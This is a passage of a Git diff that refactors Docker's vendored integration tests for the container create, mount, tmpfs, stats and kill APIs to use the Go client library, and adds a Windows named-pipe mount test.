func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) - bc <- b{status, body, err} + stats, err := cli.ContainerStats(context.Background(), name, false) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -1562,26 +1698,15 @@ func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { c.Fatal("stream was not closed after container was removed") case sr := <-bc: c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - // decode only one object from the stream - var s *types.Stats - dec := json.NewDecoder(bytes.NewBuffer(sr.body)) - c.Assert(dec.Decode(&s), checker.IsNil) + sr.stats.Body.Close() } } func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) { - type m mounttypes.Mount - type hc struct{ Mounts []m } - type cfg struct { - Image string - HostConfig hc - } type testCase struct { - config cfg - status int - msg string + config containertypes.Config + hostConfig containertypes.HostConfig + msg string } prefix, slash := getPrefixAndSlashFromDaemonPlatform() @@ -1590,176 +1715,185 @@ func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) { cases := []testCase{ { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "notreal", - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "mount type unknown", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "notreal", + Target: destPath, + }, + }, + }, + + msg: "mount type unknown", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind"}}}}, - status: http.StatusBadRequest, - msg: "Target must not be empty", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind"}}}, + msg: "Target must not be empty", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - 
HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "Source must not be empty", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Target: destPath}}}, + msg: "Source must not be empty", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Source: notExistPath, - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "bind source path does not exist", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Source: notExistPath, + Target: destPath}}}, + msg: "source path does not exist", + // FIXME(vdemeester) fails into e2e, migrate to integration/container anyway + // msg: "bind mount source path does not exist: " + notExistPath, }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume"}}}}, - status: http.StatusBadRequest, - msg: "Target must not be empty", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume"}}}, + msg: "Target must not be empty", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume", - Source: "hello", - Target: destPath}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume", + Source: "hello", + Target: destPath}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume", - Source: "hello2", - Target: destPath, - VolumeOptions: &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{ - Name: "local"}}}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume", + Source: "hello2", + Target: destPath, + 
VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local"}}}}}, + msg: "", }, } - if SameHostDaemon.Condition() { + if SameHostDaemon() { tmpDir, err := ioutils.TempDir("", "test-mounts-api") c.Assert(err, checker.IsNil) defer os.RemoveAll(tmpDir) cases = append(cases, []testCase{ { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Source: tmpDir, - Target: destPath}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Source: tmpDir, + Target: destPath}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "bind", - Source: tmpDir, - Target: destPath, - VolumeOptions: &mounttypes.VolumeOptions{}}}}}, - status: http.StatusBadRequest, - msg: "VolumeOptions must not be specified", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "bind", + Source: tmpDir, + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{}}}}, + msg: "VolumeOptions must not be specified", }, }...) 
} - if DaemonIsLinux.Condition() { + if DaemonIsLinux() { cases = append(cases, []testCase{ { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "volume", - Source: "hello3", - Target: destPath, - VolumeOptions: &mounttypes.VolumeOptions{ - DriverConfig: &mounttypes.Driver{ - Name: "local", - Options: map[string]string{"o": "size=1"}}}}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "volume", + Source: "hello3", + Target: destPath, + VolumeOptions: &mounttypes.VolumeOptions{ + DriverConfig: &mounttypes.Driver{ + Name: "local", + Options: map[string]string{"o": "size=1"}}}}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "tmpfs", - Target: destPath}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "tmpfs", + Target: destPath}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "tmpfs", - Target: destPath, - TmpfsOptions: &mounttypes.TmpfsOptions{ - SizeBytes: 4096 * 1024, - Mode: 0700, - }}}}}, - status: http.StatusCreated, - msg: "", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "tmpfs", + Target: destPath, + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 4096 * 1024, + Mode: 0700, + }}}}, + msg: "", }, { - config: cfg{ + config: containertypes.Config{ Image: "busybox", - HostConfig: hc{ - Mounts: []m{{ - Type: "tmpfs", - Source: "/shouldnotbespecified", - Target: destPath}}}}, - status: http.StatusBadRequest, - msg: "Source must not be specified", + }, + hostConfig: containertypes.HostConfig{ + Mounts: []mounttypes.Mount{{ + Type: "tmpfs", + Source: "/shouldnotbespecified", + Target: destPath}}}, + msg: "Source must not be specified", }, }...) 
} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() for i, x := range cases { c.Logf("case %d", i) - status, b, err := sockRequest("POST", "/containers/create", x.config) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, x.status, check.Commentf("%s\n%v", string(b), cases[i].config)) + _, err = cli.ContainerCreate(context.Background(), &x.config, &x.hostConfig, &networktypes.NetworkingConfig{}, "") if len(x.msg) > 0 { - c.Assert(string(b), checker.Contains, x.msg, check.Commentf("%v", cases[i].config)) + c.Assert(err.Error(), checker.Contains, x.msg, check.Commentf("%v", cases[i].config)) + } else { + c.Assert(err, checker.IsNil) } } } @@ -1774,15 +1908,21 @@ func (s *DockerSuite) TestContainerAPICreateMountsBindRead(c *check.C) { defer os.RemoveAll(tmpDir) err = ioutil.WriteFile(filepath.Join(tmpDir, "bar"), []byte("hello"), 666) c.Assert(err, checker.IsNil) - - data := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", "cat /foo/bar"}, - "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{{"Type": "bind", "Source": tmpDir, "Target": destPath}}}, + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", "cat /foo/bar"}, + } + hostConfig := containertypes.HostConfig{ + Mounts: []mounttypes.Mount{ + {Type: "bind", Source: tmpDir, Target: destPath}, + }, } - status, resp, err := sockRequest("POST", "/containers/create?name=test", data) - c.Assert(err, checker.IsNil, check.Commentf(string(resp))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "test") + c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", "test") c.Assert(out, checker.Equals, "hello") @@ -1794,47 +1934,86 @@ func (s 
*DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { destPath := prefix + slash + "foo" var ( - err error testImg string ) - if daemonPlatform != "windows" { - testImg, err = buildImage("test-mount-config", ` + if testEnv.OSType != "windows" { + testImg = "test-mount-config" + buildImageSuccessfully(c, testImg, build.WithDockerfile(` FROM busybox RUN mkdir `+destPath+` && touch `+destPath+slash+`bar CMD cat `+destPath+slash+`bar - `, true) + `)) } else { testImg = "busybox" } - c.Assert(err, checker.IsNil) type testCase struct { - cfg mounttypes.Mount + spec mounttypes.Mount expected types.MountPoint } + var selinuxSharedLabel string + // this test label was added after a bug fix in 1.32, thus add requirements min API >= 1.32 + // for the sake of making test pass in earlier versions + // bug fixed in https://github.com/moby/moby/pull/34684 + if !versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + if runtime.GOOS == "linux" { + selinuxSharedLabel = "z" + } + } + cases := []testCase{ // use literal strings here for `Type` instead of the defined constants in the volume package to keep this honest // Validation of the actual `Mount` struct is done in another test is not needed here - {mounttypes.Mount{Type: "volume", Target: destPath}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath + slash}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: 
&mounttypes.Driver{Name: volume.DefaultDriverName}}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath}}, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath + slash}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, + expected: types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, + expected: types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, } - if SameHostDaemon.Condition() { + if SameHostDaemon() { // setup temp dir for testing binds tmpDir1, err := ioutil.TempDir("", "test-mounts-api-1") c.Assert(err, checker.IsNil) defer os.RemoveAll(tmpDir1) cases = append(cases, []testCase{ - {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir1}}, - {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}}, + { + spec: mounttypes.Mount{ + Type: "bind", + Source: 
tmpDir1, + Target: destPath, + }, + expected: types.MountPoint{ + Type: "bind", + RW: true, + Destination: destPath, + Source: tmpDir1, + }, + }, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, + expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}, + }, }...) // for modes only supported on Linux - if DaemonIsLinux.Condition() { + if DaemonIsLinux() { tmpDir3, err := ioutils.TempDir("", "test-mounts-api-3") c.Assert(err, checker.IsNil) defer os.RemoveAll(tmpDir3) @@ -1843,19 +2022,40 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { c.Assert(mount.ForceMount("", tmpDir3, "none", "shared"), checker.IsNil) cases = append(cases, []testCase{ - {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}}, - {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}}, - {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}}, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, + expected: types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}, + }, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, + expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}, + }, + { + spec: mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, + expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}, + }, }...) 
} } - if daemonPlatform != "windows" { // Windows does not support volume populate + if testEnv.OSType != "windows" { // Windows does not support volume populate cases = append(cases, []testCase{ - {mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath}}, - {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath}}, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath, Mode: selinuxSharedLabel}, + }, + { + spec: mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: 
&mounttypes.VolumeOptions{NoCopy: true}}, + expected: types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath, Mode: selinuxSharedLabel}, + }, }...) } @@ -1866,96 +2066,142 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { type createResp struct { ID string `json:"Id"` } - for i, x := range cases { - c.Logf("case %d - config: %v", i, x.cfg) - status, data, err := sockRequest("POST", "/containers/create", wrapper{containertypes.Config{Image: testImg}, containertypes.HostConfig{Mounts: []mounttypes.Mount{x.cfg}}}) - c.Assert(err, checker.IsNil, check.Commentf(string(data))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(data))) - - var resp createResp - err = json.Unmarshal(data, &resp) - c.Assert(err, checker.IsNil, check.Commentf(string(data))) - id := resp.ID - - var mps []types.MountPoint - err = json.NewDecoder(strings.NewReader(inspectFieldJSON(c, id, "Mounts"))).Decode(&mps) - c.Assert(err, checker.IsNil) - c.Assert(mps, checker.HasLen, 1) - c.Assert(mps[0].Destination, checker.Equals, x.expected.Destination) - if len(x.expected.Source) > 0 { - c.Assert(mps[0].Source, checker.Equals, x.expected.Source) + ctx := context.Background() + apiclient := testEnv.APIClient() + for i, x := range cases { + c.Logf("case %d - config: %v", i, x.spec) + container, err := apiclient.ContainerCreate( + ctx, + &containertypes.Config{Image: testImg}, + &containertypes.HostConfig{Mounts: []mounttypes.Mount{x.spec}}, + &networktypes.NetworkingConfig{}, + "") + assert.NilError(c, err) + + containerInspect, err := apiclient.ContainerInspect(ctx, container.ID) + assert.NilError(c, err) + mps := containerInspect.Mounts + assert.Assert(c, is.Len(mps, 1)) + mountPoint := mps[0] + + if x.expected.Source != "" { + assert.Check(c, is.Equal(x.expected.Source, mountPoint.Source)) } - if len(x.expected.Name) > 0 { - c.Assert(mps[0].Name, checker.Equals, x.expected.Name) + if x.expected.Name != "" { + 
assert.Check(c, is.Equal(x.expected.Name, mountPoint.Name)) } - if len(x.expected.Driver) > 0 { - c.Assert(mps[0].Driver, checker.Equals, x.expected.Driver) + if x.expected.Driver != "" { + assert.Check(c, is.Equal(x.expected.Driver, mountPoint.Driver)) } - c.Assert(mps[0].RW, checker.Equals, x.expected.RW) - c.Assert(mps[0].Type, checker.Equals, x.expected.Type) - c.Assert(mps[0].Mode, checker.Equals, x.expected.Mode) - if len(x.expected.Propagation) > 0 { - c.Assert(mps[0].Propagation, checker.Equals, x.expected.Propagation) + if x.expected.Propagation != "" { + assert.Check(c, is.Equal(x.expected.Propagation, mountPoint.Propagation)) } - - out, _, err := dockerCmdWithError("start", "-a", id) - if (x.cfg.Type != "volume" || (x.cfg.VolumeOptions != nil && x.cfg.VolumeOptions.NoCopy)) && daemonPlatform != "windows" { - c.Assert(err, checker.NotNil, check.Commentf("%s\n%v", out, mps[0])) - } else { - c.Assert(err, checker.IsNil, check.Commentf("%s\n%v", out, mps[0])) + assert.Check(c, is.Equal(x.expected.RW, mountPoint.RW)) + assert.Check(c, is.Equal(x.expected.Type, mountPoint.Type)) + assert.Check(c, is.Equal(x.expected.Mode, mountPoint.Mode)) + assert.Check(c, is.Equal(x.expected.Destination, mountPoint.Destination)) + + err = apiclient.ContainerStart(ctx, container.ID, types.ContainerStartOptions{}) + assert.NilError(c, err) + poll.WaitOn(c, containerExit(apiclient, container.ID), poll.WithDelay(time.Second)) + + err = apiclient.ContainerRemove(ctx, container.ID, types.ContainerRemoveOptions{ + RemoveVolumes: true, + Force: true, + }) + assert.NilError(c, err) + + switch { + + // Named volumes still exist after the container is removed + case x.spec.Type == "volume" && len(x.spec.Source) > 0: + _, err := apiclient.VolumeInspect(ctx, mountPoint.Name) + assert.NilError(c, err) + + // Bind mounts are never removed with the container + case x.spec.Type == "bind": + + // anonymous volumes are removed + default: + _, err := apiclient.VolumeInspect(ctx, 
mountPoint.Name) + assert.Check(c, client.IsErrNotFound(err)) } + } +} - dockerCmd(c, "rm", "-fv", id) - if x.cfg.Type == "volume" && len(x.cfg.Source) > 0 { - // This should still exist even though we removed the container - dockerCmd(c, "volume", "inspect", mps[0].Name) - } else { - // This should be removed automatically when we removed the container - out, _, err := dockerCmdWithError("volume", "inspect", mps[0].Name) - c.Assert(err, checker.NotNil, check.Commentf(out)) +func containerExit(apiclient client.APIClient, name string) func(poll.LogT) poll.Result { + return func(logT poll.LogT) poll.Result { + container, err := apiclient.ContainerInspect(context.Background(), name) + if err != nil { + return poll.Error(err) + } + switch container.State.Status { + case "created", "running": + return poll.Continue("container %s is %s, waiting for exit", name, container.State.Status) } + return poll.Success() } } func (s *DockerSuite) TestContainersAPICreateMountsTmpfs(c *check.C) { testRequires(c, DaemonIsLinux) type testCase struct { - cfg map[string]interface{} + cfg mounttypes.Mount expectedOptions []string } target := "/foo" cases := []testCase{ { - cfg: map[string]interface{}{ - "Type": "tmpfs", - "Target": target}, + cfg: mounttypes.Mount{ + Type: "tmpfs", + Target: target}, expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime"}, }, { - cfg: map[string]interface{}{ - "Type": "tmpfs", - "Target": target, - "TmpfsOptions": map[string]interface{}{ - "SizeBytes": 4096 * 1024, "Mode": 0700}}, + cfg: mounttypes.Mount{ + Type: "tmpfs", + Target: target, + TmpfsOptions: &mounttypes.TmpfsOptions{ + SizeBytes: 4096 * 1024, Mode: 0700}}, expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k", "mode=700"}, }, } + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", fmt.Sprintf("mount | grep 'tmpfs on %s'", 
target)}, + } for i, x := range cases { cName := fmt.Sprintf("test-tmpfs-%d", i) - data := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", - fmt.Sprintf("mount | grep 'tmpfs on %s'", target)}, - "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{x.cfg}}, + hostConfig := containertypes.HostConfig{ + Mounts: []mounttypes.Mount{x.cfg}, } - status, resp, err := sockRequest("POST", "/containers/create?name="+cName, data) - c.Assert(err, checker.IsNil, check.Commentf(string(resp))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, cName) + c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", cName) for _, option := range x.expectedOptions { c.Assert(out, checker.Contains, option) } } } + +// Regression test for #33334 +// Makes sure that when a container which has a custom stop signal + restart=always +// gets killed (with SIGKILL) by the kill API, that the restart policy is cancelled. 
+func (s *DockerSuite) TestContainerKillCustomStopSignal(c *check.C) { + id := strings.TrimSpace(runSleepingContainer(c, "--stop-signal=SIGTERM", "--restart=always")) + res, _, err := request.Post("/containers/" + id + "/kill") + c.Assert(err, checker.IsNil) + defer res.Body.Close() + + b, err := ioutil.ReadAll(res.Body) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent, check.Commentf(string(b))) + err = waitInspect(id, "{{.State.Running}} {{.State.Restarting}}", "false false", 30*time.Second) + c.Assert(err, checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go new file mode 100644 index 0000000000..c569574de5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go @@ -0,0 +1,76 @@ +// +build windows + +package main + +import ( + "context" + "fmt" + "io/ioutil" + "math/rand" + "strings" + + winio "github.com/Microsoft/go-winio" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func (s *DockerSuite) TestContainersAPICreateMountsBindNamedPipe(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsWindowsAtLeastBuild(16299)) // Named pipe support was added in RS3 + + // Create a host pipe to map into the container + hostPipeName := fmt.Sprintf(`\\.\pipe\docker-cli-test-pipe-%x`, rand.Uint64()) + pc := &winio.PipeConfig{ + SecurityDescriptor: "D:P(A;;GA;;;AU)", // Allow all users access to the pipe + } + l, err := winio.ListenPipe(hostPipeName, pc) + if err != nil { + c.Fatal(err) + } + defer l.Close() + + // Asynchronously read data that the container writes to the mapped pipe. 
+ var b []byte + ch := make(chan error) + go func() { + conn, err := l.Accept() + if err == nil { + b, err = ioutil.ReadAll(conn) + conn.Close() + } + ch <- err + }() + + containerPipeName := `\\.\pipe\docker-cli-test-pipe` + text := "hello from a pipe" + cmd := fmt.Sprintf("echo %s > %s", text, containerPipeName) + name := "test-bind-npipe" + + ctx := context.Background() + client := testEnv.APIClient() + _, err = client.ContainerCreate(ctx, + &container.Config{ + Image: testEnv.PlatformDefaults.BaseImage, + Cmd: []string{"cmd", "/c", cmd}, + }, &container.HostConfig{ + Mounts: []mount.Mount{ + { + Type: "npipe", + Source: hostPipeName, + Target: containerPipeName, + }, + }, + }, + nil, name) + assert.NilError(c, err) + + err = client.ContainerStart(ctx, name, types.ContainerStartOptions{}) + assert.NilError(c, err) + + err = <-ch + assert.NilError(c, err) + assert.Check(c, is.Equal(text, strings.TrimSpace(string(b)))) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go index 41011c3157..8c7fff477e 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go @@ -1,84 +1,136 @@ package main import ( + "fmt" "net/http" + "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) -func (s *DockerSuite) TestAPICreateWithNotExistImage(c *check.C) { - name := "test" +func (s *DockerSuite) TestAPICreateWithInvalidHealthcheckParams(c *check.C) { + // test invalid Interval in Healthcheck: less than 0s + name := "test1" config := map[string]interface{}{ - "Image": "test456:v1", - "Volumes": map[string]struct{}{"/tmp": {}}, + 
"Image": "busybox", + "Healthcheck": map[string]interface{}{ + "Interval": -10 * time.Millisecond, + "Timeout": time.Second, + "Retries": int(1000), + }, } - status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + res, body, err := request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNotFound) - expected := "No such image: test456:v1" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) - - config2 := map[string]interface{}{ - "Image": "test456", - "Volumes": map[string]struct{}{"/tmp": {}}, + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) } - status, body, err = sockRequest("POST", "/containers/create?name="+name, config2) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusNotFound) - expected = "No such image: test456:latest" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + buf, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) - config3 := map[string]interface{}{ - "Image": "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", - } + expected := fmt.Sprintf("Interval in Healthcheck cannot be less than %s", container.MinimumDuration) + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) - status, body, err = sockRequest("POST", "/containers/create?name="+name, config3) + // test invalid Interval in Healthcheck: larger than 0s but less than 1ms + name = "test2" + config = map[string]interface{}{ + "Image": "busybox", + "Healthcheck": map[string]interface{}{ + "Interval": 500 * time.Microsecond, + "Timeout": time.Second, + "Retries": int(1000), + }, + } + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, 
http.StatusNotFound) - expected = "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) -} + buf, err = request.ReadBody(body) + c.Assert(err, checker.IsNil) -// Test for #25099 -func (s *DockerSuite) TestAPICreateEmptyEnv(c *check.C) { - name := "test1" - config := map[string]interface{}{ - "Image": "busybox", - "Env": []string{"", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, - "Cmd": []string{"true"}, + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, check.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, check.Equals, http.StatusBadRequest) } + c.Assert(getErrorMessage(c, buf), checker.Contains, expected) - status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + // test invalid Timeout in Healthcheck: less than 1ms + name = "test3" + config = map[string]interface{}{ + "Image": "busybox", + "Healthcheck": map[string]interface{}{ + "Interval": time.Second, + "Timeout": -100 * time.Millisecond, + "Retries": int(1000), + }, + } + res, body, err = request.Post("/containers/create?name="+name, request.JSONBody(config)) c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - expected := "invalid environment variable:" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + if 